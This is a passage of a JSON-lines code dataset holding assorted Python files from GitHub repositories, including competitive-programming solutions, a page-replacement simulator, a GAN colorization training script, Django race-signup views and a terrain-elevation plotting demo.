1], device=device)\n f_unrolled = f.flatten()\n face_indices_repeated_per_vertex = torch.arange(f.shape[0], device=f.device)\n face_indices_repeated_per_vertex = torch.repeat_interleave(face_indices_repeated_per_vertex, repeats=3)\n normals_repeated_per_face = per_face_vector_field[face_indices_repeated_per_vertex]\n normals_repeated_per_face = normals_repeated_per_face\n incident_face_vectors = torch.zeros([num_vertices,per_face_vector_field.shape[-1]], device=device)\n incident_face_vectors = torch.index_add(incident_face_vectors, dim=0, index=f_unrolled,\n source=normals_repeated_per_face)\n return incident_face_vectors","repo_name":"yoterel/gsoup","sub_path":"src/gsoup/geometry_advanced.py","file_name":"geometry_advanced.py","file_ext":"py","file_size_in_byte":7598,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"40512750845","text":"from ListToListnode import FuckListnode\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def sortedListToBST(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: TreeNode\n \"\"\"\n nodes = []\n while head:\n nodes.append(head.val)\n head = head.next\n return self.finddescendants(nodes)\n\n def finddescendants(self, nodes):\n if nodes:\n div = len(nodes) // 2\n head = TreeNode(nodes[div])\n head.left = self.finddescendants(nodes[:div])\n head.right = self.finddescendants(nodes[div + 1:])\n return head\n else:\n return None\n\n\nif __name__ == '__main__':\n a = [-10,-3,0,5,9]\n s = Solution()\n f = FuckListnode()\n a = f.returnNode(a)\n ans = s.sortedListToBST(a)\n print(ans)\n","repo_name":"mcclee/leetcode","sub_path":"109_sortedListToBST.py","file_name":"109_sortedListToBST.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"14519670901","text":"\"\"\"Plot the elevation of the Tuebingen surrounding.\"\"\"\nimport os\nimport shutil\nimport urllib.request\nfrom typing import Iterable, List, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport rasterio\nfrom matplotlib import cm\n\n\ndef download_data() -> str:\n \"\"\"Download elevation model data and return the raster file.\n\n Skips download if file already exists.\n\n The data comes from the SRTM Digital Surface Model of Germany. See\n https://opendem.info/download_srtm.html.\n\n Returns:\n Path to raster file.\n \"\"\"\n HERE = os.path.abspath(__file__)\n HEREDIR = os.path.dirname(HERE)\n # global\n # xmin, xmax = 5.0, 16.0\n # ymin, ymax = 47.0, 56.0\n filename = \"srtm_germany_dsm\"\n tif_filename = os.path.join(HEREDIR, f\"{filename}.tif\")\n\n if os.path.exists(tif_filename):\n print(\"Data already downloaded. Skipping.\")\n else:\n zip_source = f\"https://opendem.info/downloads/{filename}.zip\"\n zip_target = os.path.join(HEREDIR, f\"{filename}.zip\")\n zip_target_dir = os.path.dirname(zip_target)\n\n # download\n print(\"Downloading data\")\n urllib.request.urlretrieve(zip_source, zip_target)\n\n # extract\n print(\"Extracting data\")\n shutil.unpack_archive(zip_target, extract_dir=zip_target_dir)\n\n return tif_filename\n\n\ndef elevations(data_file: str, *coords: Iterable[Tuple[float, float]]) -> List[int]:\n \"\"\"Yield elevations for the requested coordinates using the data file.\n\n Args:\n data_file: Path to the TIF file that contains the elevation model.\n coords: Pairs of (x, y) coordinates\n\n Returns:\n List of elevations for the supplied coordinates.\n \"\"\"\n with rasterio.open(data_file) as src:\n vals = src.sample(coords)\n return [val[0] for val in vals]\n\n\nsrc_file = download_data()\n\n\n# to identify these values, click on a place in google maps, then look them up\n# in the link\ntue_center = (8.9735997, 48.4890488)\ntue_center_elevation = elevations(src_file, tue_center)[0]\nmpi = (9.0584233, 48.5341389)\nmpi_elevation = elevations(src_file, mpi)[0]\nmvl6 = (9.0515339, 48.5382876)\nmvl6_elevation = elevations(src_file, mvl6)[0]\n\nxmin, xmax = 9.042815, 9.091223\nymin, ymax = 48.514583, 48.545057\n\nsteps = 100\nxs = np.linspace(xmin, xmax, steps)\nys = np.linspace(ymin, ymax, steps)\nzs = np.zeros((steps, steps))\n\nxy_idx = []\ncoords = []\n\nfor x_idx, x_coord in enumerate(xs):\n for y_idx, y_coord in enumerate(ys):\n xy_idx.append((x_idx, y_idx))\n coords.append((x_coord, y_coord))\n\nfor (x_idx, y_idx), elevation in zip(xy_idx, elevations(src_file, *coords)):\n zs[y_idx, x_idx] = elevation\n\nfig, ax = plt.subplots(subplot_kw={\"projection\": \"3d\"})\n\nxs_mesh, ys_mesh = np.meshgrid(xs, ys)\nsurf = ax.plot_surface(\n xs_mesh, ys_mesh, zs, cmap=cm.coolwarm, linewidth=0, antialiased=True\n)\nfig.colorbar(surf)\nplt.show()\n","repo_name":"NurEinJemand/tueopt","sub_path":"tueopt/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"5333078621","text":"'''\n Author: Todimu Jenrola\n File name: pageReplacement.py\n Date created: 12/03/2021\n Date last modified: 26/03/2021\n Python Version: 3.6\n'''\n\ndef belady(frames, stream):\n frame = [None]*frames # initailize frame\n previous = []\n j = 0\n\n for i in range(len(stream)):\n # user_input = input(\"\")\n # # handle user exit\n # if user_input == \"\":\n # print(\"All done, goodbye!\")\n # break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(stream[i], frame):\n print(stream[i] + \"NF\")\n \n # print fault since frame is empty\n elif isFault(stream[i], frame):\n print(stream[i] + \"F\")\n frame[j] = stream[i] # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(stream[i], frame):\n print(stream[i] + \"NF\")\n \n # obtain element to evict, insert new value\n elif isFault(stream[i], frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), stream[i])\n print(stream[i] + \"F\")\n\n # perform cyclic shift operation\n else:\n index = predict(frame, stream[j:])\n evicted = frame[index]\n frame.pop(index)\n frame.insert(index, stream[i])\n print(stream[i] + \"F\" + \" E\" + evicted)\n \n previous.append(stream[i])\n \n print(frame) # check frame for debugging purposes\n\n j += 1\n\n # print(\"This is the BELADY algorithm with {} frames.\".format(frames))\n \n\ndef clock(frames):\n frame = [None]*frames\n cache = {}\n j = 0\n previous = []\n temp = 0\n\n while True:\n user_input = input(\"\")\n # handle user exit\n if user_input == \"\":\n print(\"All done, goodbye!\")\n break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n cache[user_input] = 0\n print(user_input + \"NF\")\n \n # print fault since frame is empty\n elif isFault(user_input, frame):\n cache[user_input] = 1\n print(user_input + \"F\")\n\n temp += 1\n frame[j] = user_input # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n cache[user_input] = 0\n print(user_input + \"NF\")\n \n # obtain element to evict, insert new value\n elif isFault(user_input, frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), user_input)\n cache[user_input] = 1\n print(user_input + \"F\")\n\n else:\n check = []\n\n for item in frame:\n if cache[item] == 1:\n check.append(True)\n else:\n check.append(False)\n # list(my_dict.keys())[0]\n \n if all(check):\n cache = reset(cache)\n\n evicted = frame[0]\n frame.pop(0)\n frame.insert(0, user_input)\n cache[user_input] = 1\n print(user_input + \"F\" + \" E\" + evicted)\n\n else:\n evicted = frame.pop(temp%frames)\n frame.insert((temp%frames), user_input)\n cache[user_input] = 1\n print(user_input + \"F\" + \" E\" + str(evicted))\n\n temp += 1\n\n previous.append(user_input)\n \n print(frame) # check for debugging purposes\n\n j += 1\n\n # print(\"This is the CLOCK algorithm with {} frames.\".format(frames))\n\n\ndef fifo(frames):\n frame = [None]*frames # initailize frame\n temp = 0 # variable for performing cyclic iteration\n j = 0\n\n while True:\n user_input = input(\"\")\n # handle user exit\n if user_input == \"\":\n print(\"All done, goodbye!\")\n break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n print(user_input + \"NF\")\n \n # pop appropriate index, insert to frame and print value if page fault\n elif isFault(user_input, frame):\n evicted = frame.pop(temp%frames)\n frame.insert((temp%frames), user_input)\n print(user_input + \"F\")\n\n temp += 1\n frame[j] = user_input # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n print(user_input + \"NF\")\n \n # pop appropriate index, insert to frame and print value if page fault\n elif isFault(user_input, frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), user_input)\n print(user_input + \"F\")\n\n else:\n evicted = frame.pop(temp%frames)\n frame.insert((temp%frames), user_input)\n print(user_input + \"F\" + \" E\" + evicted)\n \n temp += 1\n \n print(frame) # check frame for debugging purposes\n \n j += 1\n \n # print(\"This is the FIFO algorithm with {} frames.\".format(frames))\n\n\ndef lru(frames):\n frame = [None]*frames # initailize frame\n previous = []\n j = 0\n\n while True:\n user_input = input(\"\")\n # handle user exit\n if user_input == \"\":\n print(\"All done, goodbye!\")\n break\n\n # handle the first time when frame is pre-populated\n if j < frames:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n print(user_input + \"NF\")\n \n # print fault since frame is empty\n elif isFault(user_input, frame):\n print(user_input + \"F\")\n frame[j] = user_input # add user input to frame\n\n else:\n # print number + NF if no page fault\n if not isFault(user_input, frame):\n print(user_input + \"NF\")\n \n # obtain element to evict, insert new value\n elif isFault(user_input, frame):\n if position(frame) < frames:\n frame.pop(position(frame))\n frame.insert(position(frame), user_input)\n print(user_input + \"F\")\n\n else:\n cache = []\n k = 1\n\n # handle when least recently used position is greater then number of frames\n while len(set(cache)) != frames:\n cache.append(previous[-(k)])\n k += 1\n\n evicted = cache[-1]\n index = frame.index(evicted)\n frame.pop(index)\n frame.insert(index, user_input)\n print(user_input + \"F\" + \" E\" + evicted)\n \n previous.append(user_input)\n \n print(frame) # check frame for debugging purposes\n\n j += 1\n\n # print(\"This is the LRU algorithm with {} frames.\".format(frames))\n \n# method to check if frame is full\ndef position(frame):\n i = 0\n for entry in range(len(frame)):\n if frame[entry] == None:\n break\n i += 1\n\n return i \n\n# method to get input stream\ndef getStream():\n stream = []\n\n while True:\n user_input = input(\"\")\n if user_input == \"\":\n break\n stream.append(user_input)\n\n return stream\n\n# method to check if there is a fault\ndef isFault(frame, stream):\n\n return frame not in stream\n\n# method to reset cache\ndef reset(cache):\n for item in cache:\n cache[item] = 0\n \n return cache\n\ndef evict(frame, cache, previous):\n evicted, index = 0, 0\n\n for item in frame:\n if cache[item] == 0:\n evicted = item\n index = frame.index(item)\n\n return evicted, index\n\n\n# method to predict unused page\ndef predict(frame, stream):\n evicted = []\n for i in range(len(frame)):\n if frame[i] not in stream:\n return frame.index(frame[i])\n \n index = stream.index(frame[i])\n evicted.append(index)\n \n return frame.index(stream[max(evicted)])\n\n\nif __name__ == \"__main__\":\n\n# Example: FIFO 3, press enter and input frame entries.\n\n\n while True:\n prompt = print(\"Input algorithm type (BELADY, CLOCK, FIFO, LRU) and number of frames: \\n\")\n algorithms = [belady, clock, lru, fifo]\n selection = input(\"\")\n select = selection.split(\" \")\n\n if selection == \"\":\n print(\"Here endeth the program!\")\n break\n \n if algorithms[0].__name__ == str(select[0]).lower():\n stream = getStream()\n algorithms[0](int(select[1]), stream)\n\n else:\n for i in range(1,4):\n if algorithms[i].__name__ == str(select[0]).lower():\n algorithms[i](int(select[1]))\n \n print(\"\\n\")\n\n","repo_name":"TodimuJ/Python","sub_path":"pageReplacement.py","file_name":"pageReplacement.py","file_ext":"py","file_size_in_byte":9955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"11282134847","text":"# ABC157e\n\n\n#print(bin(toBitSet([1, 2, 3, 2])))\n\n# for i in range(97, 123):\n# print(chr(i))\n\n\ndef main():\n import sys\n sys.setrecursionlimit(10**6)\n # 再帰関数を使わない限りPypyで出すこと\n\n class SegmentTree:\n #####単位元######\n ide_ele = 0\n\n # num:n以上の最小の2のべき乗\n\n def segfunc(self, x, y):\n return x | y # 例としてmin関数を設定\n\n def __init__(self, n):\n super().__init__()\n self.num = 2**(n-1).bit_length() # nは元々の配列の長さ\n self.seg = [self.ide_ele]*(2*self.num+1)\n\n def init(self, init_val): # セグ木にしたい配列を渡す\n # set_val\n for i in range(len(init_val)):\n self.seg[i+self.num-1] = init_val[i]\n # built\n for i in range(self.num-2, -1, -1):\n self.seg[i] = self.segfunc(self.seg[2*i+1], self.seg[2*i+2])\n\n def update(self, k, x):\n k += self.num-1\n self.seg[k] = x\n while k:\n k = (k-1)//2\n self.seg[k] = self.segfunc(self.seg[k*2+1], self.seg[k*2+2])\n\n def query(self, p, q):\n if q <= p:\n return ide_ele\n p += self.num-1\n q += self.num-2\n res = self.ide_ele\n while q-p > 1:\n if p & 1 == 0:\n res = self.segfunc(res, self.seg[p])\n if q & 1 == 1:\n res = self.segfunc(res, self.seg[q])\n q -= 1\n p = p//2\n q = (q-1)//2\n if p == q:\n res = self.segfunc(res, self.seg[p])\n else:\n res = self.segfunc(self.segfunc(res, self.seg[p]), self.seg[q])\n return res\n\n n = int(input())\n s = list(input())\n q = int(input())\n\n def toBitSet(numberSet):\n theSet = 0\n for i in numberSet:\n theSet = theSet | 1 << i\n return theSet\n\n def alphabetToZeroIndexed(alphabet):\n return ord(alphabet) - 97\n\n tree = SegmentTree(n)\n\n for i in range(n):\n tree.update(i+1, toBitSet([alphabetToZeroIndexed(s[i])]))\n\n for _ in range(q):\n a, b, c = input().split()\n b = int(b)\n if int(a) == 1:\n tree.update(b, toBitSet([alphabetToZeroIndexed(c)]))\n else:\n c = int(c)\n print(bin(tree.query(b, c+1)).count('1'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuto-moriizumi/AtCoder","sub_path":"ABC157/ABC157e.py","file_name":"ABC157e.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"18154719011","text":"#### SUNEEL ####\n# NOTE: unfinished/ untested #\n\nimport os\nimport traceback\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torchvision import transforms\nimport numpy as np\n\nfrom ImagesFolder import TrainFolder\nfrom gan import Generator, Discriminator\nhave_cuda = torch.cuda.is_available()\nepochs = 3\n\noriginal_transform = transforms.Compose([\n #transforms.ToTensor(),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n \n])\n\n\ntransform = transforms.Compose(\n [\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n #transforms.ToTensor(),\n #transforms.Lambda(lambda img:print(img))\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n])\n\ng_iters = 10\nd_iters = 10\n\ncolor_dir = \"train\"#/train\"\ngray_dir = \"grayscale\"#/train\"\ntrain_set = TrainFolder(color_dir,transform )\ntrain_set_size = len(train_set)\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=32, shuffle=True, num_workers=4)\n\nG = Generator()\nD = Discriminator()\n\ngParams = 'gan_g_params.pkl'\ndParams = 'gan_d_params.pkl'\n\nif os.path.exists(gParams):\n G.load_state_dict(torch.load(gParams))\n\nif os.path.exists(dParams):\n D.load_state_dict(torch.load(dParams))\n\n#load cuda\nif have_cuda:\n G.cuda()\n D.cuda()\n\n\n# Binary cross entropy loss and optimizer\ncriterion = nn.BCELoss()\nd_optimizer = torch.optim.Adam(D.parameters(), lr=0.0003)\ng_optimizer = torch.optim.Adam(G.parameters(), lr=0.0003)\n\n\ndef to_var(x):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x)\n\n\ndef gan_train(epoch):\n G.train()\n D.train()\n try:\n for i, (images, classes) in enumerate(train_loader):\n # Build mini-batch dataset\n batch_size = images[0].size(0)\n\n messagefile = open('./message.txt', 'a')\n bw_image = images[0].unsqueeze(1).float()\n ab_image = images[1].float()\n\n bw_image = to_var(bw_image)\n ab_image = to_var(ab_image)\n classes = to_var(classes)\n\n # Create the labels which are later used as input for the BCE loss\n real_labels = to_var(torch.ones(batch_size))\n fake_labels = to_var(torch.zeros(batch_size))\n\n #============= Train the discriminator =============#\n # Compute BCE_Loss using real images where BCE_Loss(x, y): - y * log(D(x)) - (1-y) * log(1 - D(x))\n # Second term of the loss is always zero since real_labels == 1\n outputs = D(ab_image)\n d_loss_real = criterion(outputs, real_labels)\n real_score = outputs\n \n # Compute BCELoss using fake images\n # First term of the loss is always zero since fake_labels == 0\n # z = to_var(torch.randn(batch_size, 64))\n fake_images = G(bw_image)\n outputs = D(fake_images)\n d_loss_fake = criterion(outputs, fake_labels)\n fake_score = outputs\n\n # n = np.array(outputs.size(), dtype='int64')\n # # print n.dtype\n # ems_loss = torch.pow((ab_image - outputs), 2).sum() / torch.from_numpy(n).prod()\n # loss = ems_loss\n # lossmsg = 'loss: %.9f\\n' % (loss.data[0])\n # messagefile.write(lossmsg)\n # ems_loss.backward(retain_variables=True)\n\n # Backprop + Optimize\n d_loss = d_loss_real + d_loss_fake\n D.zero_grad()\n d_loss.backward()\n d_optimizer.step()\n \n #=============== Train the generator ===============#\n # Compute loss with fake images\n # z = to_var(torch.randn(batch_size, 64))\n fake_images = G(bw_image) #again, consider removing\n outputs = D(fake_images)\n \n # We train G to maximize log(D(G(z)) instead of minimizing log(1-D(G(z)))\n # For the reason, see the last paragraph of section 3. https://arxiv.org/pdf/1406.2661.pdf\n g_loss = criterion(outputs, real_labels)\n \n # Backprop + Optimize\n D.zero_grad()\n G.zero_grad()\n g_loss.backward()\n g_optimizer.step()\n \n #output every 10 batches\n if (i+1) % 10 == 0 or i == 0:\n print('Epoch [%d/%d], Step[%d/%d], d_loss: %.4f, '\n 'g_loss: %.4f, D(x): %.2f, D(G(z)): %.2f' \n %(epoch, epochs, i+1, len(train_loader), d_loss.data[0], g_loss.data[0],\n real_score.data.mean(), fake_score.data.mean()))\n torch.save(G.state_dict(), gParams)\n torch.save(D.state_dict(), dParams)\n \n # Save real images\n # if (epoch+1) == 1:\n # images = images.view(images.size(0), 1, 28, 28)\n # save_image(denorm(images.data), './data/real_images.png')\n \n # Save sampled images\n # fake_images = fake_images.view(fake_images.size(0), 1, 28, 28)\n # save_image(denorm(fake_images.data), './data/fake_images-%d.png' %(epoch+1))\n except Exception:\n logfile = open('log.txt', 'w')\n logfile.write(traceback.format_exc())\n logfile.close()\n finally:\n # Save the trained parameters \n torch.save(G.state_dict(), gParams)\n torch.save(D.state_dict(), dParams)\n\n\n\nfor epoch in range(1, epochs + 1):\n gan_train(epoch)\n","repo_name":"patrickrchao/Image-Colorization","sub_path":"gan_train.py","file_name":"gan_train.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"36672272722","text":"from unittest import TestCase as UnitTestTestCase\nfrom delfick_error import DelfickErrorTestMixin\nfrom contextlib import contextmanager\nimport tempfile\nimport shutil\nimport os\n\n@contextmanager\ndef a_file(contents=None, removed=False):\n location = None\n try:\n location = tempfile.NamedTemporaryFile(delete=False).name\n if contents:\n with open(location, 'w') as fle:\n fle.write(contents)\n if removed:\n os.remove(location)\n yield location\n finally:\n if location and os.path.exists(location):\n os.remove(location)\n\n@contextmanager\ndef a_directory(removed=False):\n location = None\n try:\n location = tempfile.mkdtemp()\n if removed:\n shutil.rmtree(location)\n yield location\n finally:\n if location and os.path.exists(location):\n shutil.rmtree(location)\n\nclass TestCase(UnitTestTestCase, DelfickErrorTestMixin):\n def assertSortedEqual(self, listone, listtwo):\n self.assertEqual(sorted(listone), sorted(listtwo))\n\n","repo_name":"realestate-com-au/iam_syncr","sub_path":"tests/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"40262241733","text":"# coding=utf-8\n\"\"\"\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n ------------------------------------------------------\n File Name : ${NAME}\n Author : jiaqi.hjq\n\"\"\"\nimport logging\nimport traceback\nfrom datetime import datetime\n\nLOGGER = logging.getLogger(__name__)\nimport json\n\nfrom django.views.generic.edit import ProcessFormView\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\nfrom django.views.generic import TemplateView\nfrom django.views.generic.detail import BaseDetailView\nfrom django.views.generic.list import BaseListView\n\nfrom .models.competition import Competition\nfrom .models.racer import RacerLog, Team, RacerInfo\n\n\nclass IndexView(TemplateView):\n template_name = \"index.html\"\n\n\nclass JsonViewMixin:\n def render_to_response(self, context, **response_kwargs):\n obj = context['object']\n return JsonResponse({'object': obj}, **response_kwargs)\n\n\nclass JsonListViewMixin:\n def render_to_response(self, context, **response_kwargs):\n objname = self.get_context_object_name(context[\"object_list\"])\n objs = context[objname]\n\n return JsonResponse({objname: list(objs)}, **response_kwargs)\n\n\nclass CompetitionListView(JsonListViewMixin, BaseListView):\n context_object_name = 'competitions'\n ordering = [\"-startDate\", \"-endDate\"]\n\n def get_queryset(self):\n qs = Competition.objects.select_related('serialId')\n qs = qs.filter(signUpOpen=True) if self.request.GET.get(\"showOpen\", False) == \"true\" else qs.all()\n return qs.values()\n\n\nclass CompetitionGroupListView(JsonListViewMixin, BaseListView):\n context_object_name = 'groups'\n\n def get_queryset(self):\n # obj = get_object_or_404(Competition, uniname=self.kwargs['competition_uniname'])\n return RacerLog.objects.select_related('competitionId__uniname', 'racerId__realName', 'racerId__gender',\n 'racerId__region', 'teamId__name').filter(\n competitionId__uniname=self.kwargs['competition_uniname']).values('group', 'racerTag', 'racerId__realName',\n 'racerId__gender', 'racerId__region',\n 'teamId__name')\n\n\nclass CompetitionDetailView(JsonViewMixin, BaseDetailView):\n # competition_fields = get_model_all_fields_names(Competition)\n\n def get_object(self, queryset=None):\n # print(self.competition_fields)\n qs = Competition.objects.select_related('serialId__name').values('serialId__name', 'name', 'location',\n 'description', 'groupSetting',\n 'startDate', 'endDate', 'signUpOpen',\n 'uniname', 'signUpFee', 'signUpStartDate',\n 'signUpEndDate', 'manager')\n return get_object_or_404(qs, uniname=self.kwargs['competition_uniname'])\n\n\nclass CompetitionSignupView(JsonViewMixin, ProcessFormView):\n success_url = \"signup_success.html\"\n\n def post(self, request, *args, **kwargs):\n request.META[\"CSRF_COOKIE_USED\"] = True\n\n obj = json.loads(request.body.decode('utf-8'))\n try:\n succ, msg = self.validate(obj)\n if succ:\n self.save_object(obj)\n obj = {\"success\": succ, \"message\": msg}\n except Exception as e:\n LOGGER.error(traceback.format_exc())\n obj = {\"success\": False, \"message\": str(e)}\n return self.render_to_response({\"object\": obj})\n\n def save_object(self, obj):\n qs = RacerInfo.objects.all()\n try:\n idtype = 0 if obj[\"region\"] == \"CHN\" else 1\n racer = qs.get(idType=idtype, idNumber=obj[\"idNumber\"], realName=obj[\"realName\"])\n # allow update some info\n racer.region = obj[\"region\"]\n racer.phoneNumber = obj[\"phoneNumber\"]\n racer.ecpName = obj[\"ecpName\"]\n racer.ecpNumber = obj[\"ecpNumber\"]\n except RacerInfo.DoesNotExist:\n # idtype is not posted here. check region instead.\n racer = RacerInfo(realName=obj[\"realName\"], gender=obj[\"gender\"], birthday=obj[\"birthday\"],\n region=obj[\"region\"], idType=idtype, idNumber=obj[\"idNumber\"],\n phoneNumber=obj[\"phoneNumber\"], ecpName=obj[\"ecpName\"], ecpNumber=obj[\"ecpNumber\"])\n racer.save()\n\n qs = Team.objects.all()\n if obj[\"teamId\"] == \"NEW\":\n try:\n team = qs.get(name=obj[\"teamName\"])\n except Team.DoesNotExist:\n team = Team(name=obj[\"teamName\"], leaderName=obj[\"teamLeader\"], leaderPhone=obj[\"teamLeaderPhone\"])\n else:\n team = qs.get(id=obj[\"teamId\"])\n team.save()\n\n comp = self.get_comp(uniname=self.kwargs['competition_uniname'])\n if RacerLog.objects.all().filter(racerId=racer, competitionId=comp).exists():\n return\n racerlog = RacerLog(racerId=racer, competitionId=comp, teamId=team, group=obj[\"group\"])\n racerlog.save()\n\n def validate(self, obj):\n for k, v in obj.items():\n obj[k] = str(v).strip()\n\n if not self._is_phone_number(obj[\"phoneNumber\"]):\n return False, \"请填写正确的号码\"\n\n obj[\"birthday\"] = datetime.strptime(obj[\"birthday\"].split(\"T\")[0], \"%Y-%m-%d\")\n\n # check_racer_number\n comp = self.get_comp(uniname=self.kwargs['competition_uniname'])\n if obj[\"group\"] not in [s.strip() for s in comp.groupSetting.strip().split(',')]:\n return False, \"请选择正确的分组\".format(comp.manager)\n if not comp.signUpOpen:\n return False, \"报名已关闭,请联系管理员!{}\".format(comp.manager)\n if RacerLog.objects.filter(\n competitionId__uniname=self.kwargs['competition_uniname']).count() >= comp.maxRacerCount:\n return False, \"报名人数已到上限,请联系管理员!{}\".format(comp.manager)\n\n return True, \"\"\n\n def get_comp(self, **kwargs):\n return Competition.objects.all().get(**kwargs)\n\n def _is_phone_number(self, number: str):\n try:\n number = number.replace('-', '')\n if number.startswith('+'):\n number = number[1:]\n return number.isdigit() and len(number) >= 11\n except:\n return False\n\n def get_success_url(self, context):\n return self.request.path + \"success/\"\n\n\nclass TeamListView(JsonListViewMixin, BaseListView):\n context_object_name = 'teams'\n\n def get_queryset(self):\n return Team.objects.all().values('id', 'name', 'leaderName')\n\n\nclass CompetitionSignupSuccessView(TemplateView):\n template_name = \"signup_success.html\"\n","repo_name":"wanderxjtu/enduro-racer","sub_path":"enduro_racer/race/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"26193358988","text":"import unittest\nimport numpy as np\n\n\nclass Solution:\n def knapsack_01(self, items, w_max):\n\n b = [0 for w in range(w_max + 1)]\n\n # list of knapsacks\n knapsack_list = [set() for w in range(w_max + 1)]\n\n # loop k from 1 to n\n for item in list(items.items()):\n\n # item: [item_name, [weight, benefit]]\n item_name = item[0]\n\n w_k = item[1][0]\n\n b_k = item[1][1]\n\n # loop in reverse to access b[k-1] and b[k-1, w - w_k] before overwriting\n # loop w from w_max to w_k (if w < w_k do nothing)\n for w in range(w_max, w_k - 1, -1):\n\n x = b[w - w_k] + b_k\n\n if x > b[w]:\n # item is worth putting in\n b[w] = x\n\n # add item to knapsack entry\n knapsack_list[w] = knapsack_list[w - w_k] ^ set({item_name})\n\n print(b)\n print(knapsack_list)\n\n return knapsack_list[w_max]\n\n\nclass TestSolution(unittest.TestCase):\n def test_1(self):\n\n # \"item\": [weight, benefit]\n s = {\"a\": [2, 3], \"b\": [4, 5], \"c\": [5, 8], \"d\": [3, 4], \"e\": [9, 10]}\n\n w_max = 20\n knapsack = {\"a\", \"b\", \"c\", \"e\"}\n knapsack_w_max = Solution().knapsack_01(s, w_max)\n self.assertSetEqual(knapsack_w_max, knapsack)\n\n def test_2(self):\n\n s = {\n \"a\": [12, 4],\n \"b\": [10, 6],\n \"c\": [8, 5],\n \"d\": [11, 7],\n \"e\": [14, 3],\n \"f\": [7, 1],\n \"g\": [9, 6],\n }\n w_max = 18\n knapsack = {\"b\", \"c\"}\n knapsack_w_max = Solution().knapsack_01(s, w_max)\n self.assertSetEqual(knapsack_w_max, knapsack)\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"Wet1988/ds-algo","sub_path":"algorithms/knapsack_01.py","file_name":"knapsack_01.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"16977577608","text":"n = int(input())\nbook = []\nfor _ in range(n):\n age, name = input().split()\n book.append((int(age), name))\n\nbook.sort(key=lambda x: x[0])\n\nfor b in book:\n print(b[0], b[1])","repo_name":"rlacksgus97/algorithms","sub_path":"2022-01/10814.py","file_name":"10814.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"26597195237","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n city = input('Enter The City Name: (chicago, new york city, or washington): ').lower()\n if city not in CITY_DATA.keys():\n print('Please, Enter the city correctly!')\n else:\n break\n\n # get user input for month (all, january, february, ... , june)\n months = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n \n while True:\n month = input('Choose Month: (january, february, march, april, may, june, Or all): ').lower()\n if month in months:\n break\n else:\n print('Please, Enter a valid month!')\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n days = ['sunday', 'monday', 'tuesday', 'wednesday', ', thursday', 'friday', 'saturday', 'all']\n \n while True:\n day = input('Choose The Day: ').lower()\n if day in days:\n 